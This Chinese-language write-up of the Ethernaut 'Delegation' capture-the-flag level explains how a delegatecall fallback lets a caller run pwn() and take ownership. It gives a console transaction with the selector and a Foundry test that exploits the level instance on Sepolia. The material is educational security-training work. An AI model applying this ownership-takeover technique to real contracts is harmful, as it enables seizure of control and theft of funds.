# Ethernaut CTF Level 6 - Delegation
## 題目
這一關的目標是取得創建實例的所有權。
可能會有用的資訊
* 仔細看 solidity 文件關於 delegatecall 的低階函式。它是如何怎麽運行,如何委派操作給鏈上函式函式庫,以及它對執行時期作用範圍的影響
* fallback 方法(method)
* 方法(method)的 ID
```solidity=
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Delegate {
address public owner;
constructor(address _owner) {
owner = _owner;
}
function pwn() public {
owner = msg.sender;
}
}
contract Delegation {
address public owner;
Delegate delegate;
constructor(address _delegateAddress) {
delegate = Delegate(_delegateAddress);
owner = msg.sender;
}
fallback() external {
(bool result,) = address(delegate).delegatecall(msg.data);
if (result) {
this;
}
}
}
```
<br>
## 分析
題目在fallback function提供了delegationCall
這允許callee更改caller的狀態,包含呼叫function
```
[delegatecall 使用]
│
├── 呼叫者合約 (發起 delegatecall)
│ │
│ ├── 維持自身狀態
│ │
│ ├── 維持自身以太幣餘額
│ │
│ └── 維持自身合約地址 (this)
│
└── 被呼叫合約 (代碼被執行)
│
├── 使用呼叫者合約的存儲 (狀態變量)
│
├── 使用呼叫者合約的以太幣餘額
│
└── 使用呼叫者合約地址 (this)
```
<br>
目的是得到pwn()的 function signature 再填入到msg.data內。
可以到這個網站填入pwn()得到 hash ,得到abi signature (前4個 byte)
- https://emn178.github.io/online-tools/keccak_256.html
## 攻擊
得到pwn()的function signature是`dd365b8b`
可以用下面方法呼叫fallback,裡面的msg.data會被delegateCall呼叫
- 也就是`pwn()`
```solidity
await contract.sendTransaction({data:'dd365b8b'})
```
<br>
## Foundry Test
```solidity=
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "forge-std/Vm.sol";
import "../src/levels/06-Delegation/Delegation.sol";
contract ContractTest is Test {
Delegation level6 =
Delegation(payable(0x12B6C4Fc18970Aa7a962b967d7a32170c5Cb65A3));
function setUp() public {
Vm vm = Vm(address(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D));
vm.createSelectFork(vm.rpcUrl("sepolia"));
vm.label(address(this), "Attacker");
vm.label(
address(0x12B6C4Fc18970Aa7a962b967d7a32170c5Cb65A3),
"Ethernaut06"
);
}
function testEthernaut06() public {
level6.owner();
(bool success, ) = address(level6).call{value: 0}(
abi.encodeWithSignature("pwn()")
);
assert(level6.owner() == address(this));
}
receive() external payable {}
}
```
<br>
## 補充
From Ethernaut
使用 delegatecall 是風險蠻高的行為,而且過去的多次攻擊中,它常常是被利用的攻擊向量。如果用了它,你的合約根本是在說「欸欸!看這裡,其它合約/函式函式庫,想要對我的狀態怎麼玩弄都可以喔」。被委派的實例(delegate)對你合約的狀態有完整的權限。delegatecall 函式是一個非常強大的工具,但是同時也十分危險,在使用的時候需要非常的小心。
請參見 The Parity Wallet Hack Explained 這篇文章,它詳細解釋了當初如何透過這個方法去竊取三千萬美元。
https://blog.openzeppelin.com/on-the-parity-wallet-multisig-hack-405a8c12e8f7
<br>
Sign in via Google
Sign in via Facebook
Sign in via X(Twitter)
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Connect another wallet